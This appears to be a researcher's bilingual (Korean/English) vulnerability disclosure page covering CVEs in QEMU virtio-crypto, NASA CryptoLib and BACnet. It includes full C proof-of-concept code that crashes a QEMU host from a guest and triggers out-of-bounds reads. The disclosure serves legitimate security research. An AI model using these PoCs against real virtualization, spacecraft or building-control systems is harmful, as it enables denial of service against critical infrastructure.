Finder

CVE-2025-14876

Finder16 — Wed, 14 Jan 2026 21:28:28 +0900

KR

qemu

qemu는 CPU 아키텍처를 소프트웨어 기반으로 에뮬레이팅해주는 툴입니다

취약점 설명

virtio-crypto.c에서 AKCIPHER 처리 로직에서 터지는 취약접입니다

symmetric경로에선 conf.max_size를 사용해 입력 길이 제한을 강제하지만 AKCIPHER 검증이 없습니다

따라서 게스트는 큰 값을 할당을 시도할수있으며 게스트에서 호스트를 kill할수있는 취약점이 터지게됩니다

PoC

#include "qemu/osdep.h"
  #include "libqtest.h"
  #include "qemu/bswap.h"
  #include "standard-headers/linux/virtio_crypto.h"
  #include "standard-headers/linux/pci_regs.h"
  #include "libqos/malloc-pc.h"
  #include "libqos/pci-pc.h"
  #include "libqos/virtio-pci.h"

  #define HUGE_LEN 0xF0000000U /* ~3.75 GiB per buffer */

  static QPCIDevice *find_virtio_dev(QPCIBus *bus, uint16_t *out_devfn)
  {
      QPCIDevice *pdev = g_new0(QPCIDevice, 1);
      pdev->bus = bus;

      for (int devfn = 0; devfn < 256; devfn++) {
          uint16_t vendor, device;

          pdev->devfn = devfn;
          vendor = qpci_config_readw(pdev, PCI_VENDOR_ID);
          if (vendor != 0x1af4) {
              continue;
          }
          device = qpci_config_readw(pdev, PCI_DEVICE_ID);
          /* first virtio-pci device we see */
          *out_devfn = devfn;
          pdev->devfn = devfn;
          pdev->msix_enabled = false;
          return pdev;
      }

      g_free(pdev);
      return NULL;
  }

  static void test_virtio_crypto_oom(void)
  {
      QTestState *qts = qtest_init("-machine q35 -accel qtest -nodefaults "
                                   "-display none "
                                   "-object cryptodev-backend-builtin,id=crypt0 "
                                   "-device virtio-crypto-pci,cryptodev=crypt0");
      QGuestAllocator alloc;
      QPCIBus *bus;
      QPCIDevice *pdev;
      QVirtioPCIDevice *vdev;
      QVirtQueue *vq;
      QPCIAddress addr = { 0 };
      struct virtio_crypto_op_data_req req = { 0 };
      uint64_t req_addr, status_addr;
      uint8_t status = 0xff;
      uint32_t free_head;

      pc_alloc_init(&alloc, qts, ALLOC_NO_FLAGS);
      bus = qpci_new_pc(qts, &alloc);
      g_assert_nonnull(bus);

      pdev = find_virtio_dev(bus, (uint16_t *)&addr.devfn);
      g_assert_nonnull(pdev);

      addr.vendor_id = qpci_config_readw(pdev, PCI_VENDOR_ID);
      addr.device_id = qpci_config_readw(pdev, PCI_DEVICE_ID);

      vdev = virtio_pci_new(bus, &addr);
      g_assert_nonnull(vdev);

      qvirtio_pci_device_enable(vdev);
      qvirtio_reset(&vdev->vdev);

      qvirtio_set_acknowledge(&vdev->vdev);
      qvirtio_set_driver(&vdev->vdev);
      uint64_t features = qvirtio_get_features(&vdev->vdev) |
                          (1ull << VIRTIO_F_VERSION_1);
      qvirtio_set_features(&vdev->vdev, features);
      qvirtio_set_driver_ok(&vdev->vdev);

      vq = qvirtqueue_setup(&vdev->vdev, &alloc, 0);
      g_assert_nonnull(vq);

      req.header.opcode = cpu_to_le32(VIRTIO_CRYPTO_AKCIPHER_ENCRYPT);
      req.u.akcipher_req.para.src_data_len = cpu_to_le32(HUGE_LEN);
      req.u.akcipher_req.para.dst_data_len = cpu_to_le32(HUGE_LEN);

      req_addr = guest_alloc(&alloc, sizeof(req));
      qtest_memwrite(qts, req_addr, &req, sizeof(req));

      status_addr = guest_alloc(&alloc, sizeof(status));
      qtest_memwrite(qts, status_addr, &status, sizeof(status));

      free_head = qvirtqueue_add(qts, vq, req_addr, sizeof(req),
                                 false, true);
      qvirtqueue_add(qts, vq, status_addr, sizeof(status),
                     true, false);
      qvirtqueue_kick(qts, &vdev->vdev, vq, free_head);
      qtest_quit(qts);
  }

  int main(int argc, char **argv)
  {
      g_test_init(&argc, &argv, NULL);
      g_test_add_func("/virtio/crypto/oom", test_virtio_crypto_oom);
      return g_test_run();
  }

EN

QEMU

QEMU is a tool that emulates CPU architectures using software-based virtualization

Vulnerability Description

This vulnerability occurs in the AKCIPHER handling logic in virtio-crypto.c

While the symmetric path enforces an input length limit using conf.max_size the AKCIPHER path lacks any such validation
As a result, a guest can request extremely large allocations leading QEMU to attempt excessive memory allocation and ultimately crash

This allows an unprivileged guest to trigger a Dos effectively killing the host QEMU process

PoC

#include "qemu/osdep.h"
  #include "libqtest.h"
  #include "qemu/bswap.h"
  #include "standard-headers/linux/virtio_crypto.h"
  #include "standard-headers/linux/pci_regs.h"
  #include "libqos/malloc-pc.h"
  #include "libqos/pci-pc.h"
  #include "libqos/virtio-pci.h"

  #define HUGE_LEN 0xF0000000U /* ~3.75 GiB per buffer */

  static QPCIDevice *find_virtio_dev(QPCIBus *bus, uint16_t *out_devfn)
  {
      QPCIDevice *pdev = g_new0(QPCIDevice, 1);
      pdev->bus = bus;

      for (int devfn = 0; devfn < 256; devfn++) {
          uint16_t vendor, device;

          pdev->devfn = devfn;
          vendor = qpci_config_readw(pdev, PCI_VENDOR_ID);
          if (vendor != 0x1af4) {
              continue;
          }
          device = qpci_config_readw(pdev, PCI_DEVICE_ID);
          /* first virtio-pci device we see */
          *out_devfn = devfn;
          pdev->devfn = devfn;
          pdev->msix_enabled = false;
          return pdev;
      }

      g_free(pdev);
      return NULL;
  }

  static void test_virtio_crypto_oom(void)
  {
      QTestState *qts = qtest_init("-machine q35 -accel qtest -nodefaults "
                                   "-display none "
                                   "-object cryptodev-backend-builtin,id=crypt0 "
                                   "-device virtio-crypto-pci,cryptodev=crypt0");
      QGuestAllocator alloc;
      QPCIBus *bus;
      QPCIDevice *pdev;
      QVirtioPCIDevice *vdev;
      QVirtQueue *vq;
      QPCIAddress addr = { 0 };
      struct virtio_crypto_op_data_req req = { 0 };
      uint64_t req_addr, status_addr;
      uint8_t status = 0xff;
      uint32_t free_head;

      pc_alloc_init(&alloc, qts, ALLOC_NO_FLAGS);
      bus = qpci_new_pc(qts, &alloc);
      g_assert_nonnull(bus);

      pdev = find_virtio_dev(bus, (uint16_t *)&addr.devfn);
      g_assert_nonnull(pdev);

      addr.vendor_id = qpci_config_readw(pdev, PCI_VENDOR_ID);
      addr.device_id = qpci_config_readw(pdev, PCI_DEVICE_ID);

      vdev = virtio_pci_new(bus, &addr);
      g_assert_nonnull(vdev);

      qvirtio_pci_device_enable(vdev);
      qvirtio_reset(&vdev->vdev);

      qvirtio_set_acknowledge(&vdev->vdev);
      qvirtio_set_driver(&vdev->vdev);
      uint64_t features = qvirtio_get_features(&vdev->vdev) |
                          (1ull << VIRTIO_F_VERSION_1);
      qvirtio_set_features(&vdev->vdev, features);
      qvirtio_set_driver_ok(&vdev->vdev);

      vq = qvirtqueue_setup(&vdev->vdev, &alloc, 0);
      g_assert_nonnull(vq);

      req.header.opcode = cpu_to_le32(VIRTIO_CRYPTO_AKCIPHER_ENCRYPT);
      req.u.akcipher_req.para.src_data_len = cpu_to_le32(HUGE_LEN);
      req.u.akcipher_req.para.dst_data_len = cpu_to_le32(HUGE_LEN);

      req_addr = guest_alloc(&alloc, sizeof(req));
      qtest_memwrite(qts, req_addr, &req, sizeof(req));

      status_addr = guest_alloc(&alloc, sizeof(status));
      qtest_memwrite(qts, status_addr, &status, sizeof(status));

      free_head = qvirtqueue_add(qts, vq, req_addr, sizeof(req),
                                 false, true);
      qvirtqueue_add(qts, vq, status_addr, sizeof(status),
                     true, false);
      qvirtqueue_kick(qts, &vdev->vdev, vq, free_head);
      qtest_quit(qts);
  }

  int main(int argc, char **argv)
  {
      g_test_init(&argc, &argv, NULL);
      g_test_add_func("/virtio/crypto/oom", test_virtio_crypto_oom);
      return g_test_run();
  }

CVE-2026-21898

Finder16 — Sun, 11 Jan 2026 11:27:37 +0900

KR

CryptoLib

CryptoLib은 NASA의 cFS(core Flight System)가 구동되는 우성체와 지상국 간의 통신을 보호하기 위해 하드웨어 보안 모듈(HSM) 없이 소프트웨어만으로 CCSDS SDLS-EP(Extended Procedures)를 구현한 오픈소스 프로젝트입니다

취약점 설명

crypto_aos.c 에서 FHECF를 파싱할때 길이 검사가 프레임 최소 길이를 aos_hdr_len(6바이트)만 확인하고, aos_has_fhec == AOS_HAS_FHEC이면 곧바로 p_ingest[6], p_ingest[7]을 읽고 Crypto_Calc_FHECF(p_ingest)를 호출합니다
따라서 길이가 6~7바이트로 잘린 AOS 프레임을 넣으면 OOB Read가 트리거됩니다
이후 len_ingest < max_frame_size 체크가 있지만 OOB Read가 생기고 검증합니다

poc

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static const int aos_has_fhec = 1;

int process_frame(uint8_t *p_ingest, size_t len_ingest)
{
    const size_t aos_hdr_len = 6;
    size_t       byte_idx    = aos_hdr_len;

    if (len_ingest < aos_hdr_len)
    {
        fprintf(stderr, "Frame too short for header\n");
        return -1;
    }

    if (aos_has_fhec)
    {
        uint16_t received_fhecf =
            ((uint16_t)p_ingest[byte_idx] << 8) | ((uint16_t)p_ingest[byte_idx + 1]);
        printf("Parsed FHECF (OOB read) = 0x%04x\n", received_fhecf);
    }

    return 0;
}

int main(void)
{
    uint8_t frame[6];
    memset(frame, 0xAA, sizeof(frame));

    printf("Feeding %zu-byte frame to vulnerable parser...\n", sizeof(frame));
    int rc = process_frame(frame, sizeof(frame));

    printf("Return code: %d\n", rc);
    return rc;
}

EN

CryptoLib

CryptoLib is an open-source project that implements CCSDS SDLS-EP (Extended Procedures) purely in software, without relying on a hardware security module (HSM), to protect communications between spacecraft running NASA’s cFS (core Flight System) and ground stations.

Vulnerability Description

In crypto_aos.c when parsing the FHECF the length check only verifies the minimum AOS frame length (aos_hdr_len, 6 bytes).
If aos_has_fhec == AOS_HAS_FHEC the code immediately reads p_ingest[6] and p_ingest[7] and calls Crypto_Calc_FHECF(p_ingest)

As a result providing a truncated AOS frame with a length of 6–7 bytes triggers an out-of-bounds read
Although there is a subsequent check of len_ingest < max_frame_size, the out-of-bounds read occurs before this validation

poc

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static const int aos_has_fhec = 1;

int process_frame(uint8_t *p_ingest, size_t len_ingest)
{
    const size_t aos_hdr_len = 6;
    size_t       byte_idx    = aos_hdr_len;

    if (len_ingest < aos_hdr_len)
    {
        fprintf(stderr, "Frame too short for header\n");
        return -1;
    }

    if (aos_has_fhec)
    {
        uint16_t received_fhecf =
            ((uint16_t)p_ingest[byte_idx] << 8) | ((uint16_t)p_ingest[byte_idx + 1]);
        printf("Parsed FHECF (OOB read) = 0x%04x\n", received_fhecf);
    }

    return 0;
}

int main(void)
{
    uint8_t frame[6];
    memset(frame, 0xAA, sizeof(frame));

    printf("Feeding %zu-byte frame to vulnerable parser...\n", sizeof(frame));
    int rc = process_frame(frame, sizeof(frame));

    printf("Return code: %d\n", rc);
    return rc;
}

CVE-2026-21897

Finder16 — Sun, 11 Jan 2026 11:09:28 +0900

KR

CryptoLib

취약점 설명

Crypto_Config_Add_Gvcid_Managed_Parameters 함수는 gvcid_counter > GVCID_MAN_PARAM_SIZE 조건만을 검사합니다(src/core/crypto_config.c
그 결과 최대 251번째 엔트리까지 허용하게 되며 이는 oob를 트리거하여 gvcid_managed_parameters_array[250] 바로 뒤에 위치한 gvcid_counter를 덮어쓰게 됩니다
이로 인해 oob write 취약점이 발생하며 덮어써진 gvcid_counter 값이 임의의 값으로 변조될 수 있어 해당 값을 기반으로 동작하는 파라미터 조회 및 등록 로직에 잠재적인 영향을 미칠 수 있습니다

EN

CryptoLib

CryptoLib is an open-source project that implements CCSDS SDLS-EP (Extended Procedures) purely in software, without relying on a hardware security module (HSM), in order to protect communications between spacecraft running NASA’s cFS (core Flight System) and ground stations.

Vulnerability Description

The Crypto_Config_Add_Gvcid_Managed_Parameters function only checks the condition gvcid_counter > GVCID_MAN_PARAM_SIZE (src/core/crypto_config.c).
As a result, it allows up to the 251st entry, which triggers an out-of-bounds condition and overwrites gvcid_counter, which is located immediately after gvcid_managed_parameters_array[250].
This leads to an out-of-bounds write vulnerability, and the overwritten gvcid_counter may be corrupted to an arbitrary value, potentially affecting parameter lookup and registration logic that relies on this counter.

CVE-2025-66624

Finder16 — Fri, 9 Jan 2026 00:19:45 +0900

BAcnet는에서 저의 첫 cve를 발급받았습니다
BAcnet는 빌딩을 제어하는 산업제어용 프로토콜로 건물 자동화 및 제어 시스템을 위해 사용된다고합니다
해당 버그는 npdu.c의 NPDU 파싱 로직에서 길이 검증 없이 고정 오프셋으로 바이트를 참조하기 때문에 발생합니다
request_pdu[offset+2/3/5] 및 reply_pdu[offset+1/2/4]를 인덱싱을 할때 해당 APDU 바이트가 실제로 존재하는지 검증을 하지않습니다
bacnet_npdu_decode()는 는 2바이트짜리 NPDU에 대해 offset == 2를 반환을 해서 작은 PDU들이 버전 체크를 통과한 뒤 oob read가 발생합니다

#include <stdio.h>
#include <stdint.h>
#include <stdbool.h>
#include <string.h>
#include "bacnet/npdu.h"

int main(void) {
    /* minimal NPDU: version=1, control=DER flag only */
    uint8_t tiny_pdu[2] = { BACNET_PROTOCOL_VERSION, 0x04 };

    /* addresses/lengths are ignored but match API signature */
    bool ok = npdu_is_data_expecting_reply(
        tiny_pdu, sizeof(tiny_pdu), 1,
        tiny_pdu, sizeof(tiny_pdu), 1);

    printf("npdu_is_data_expecting_reply returned %d\n", ok);
    return 0;
}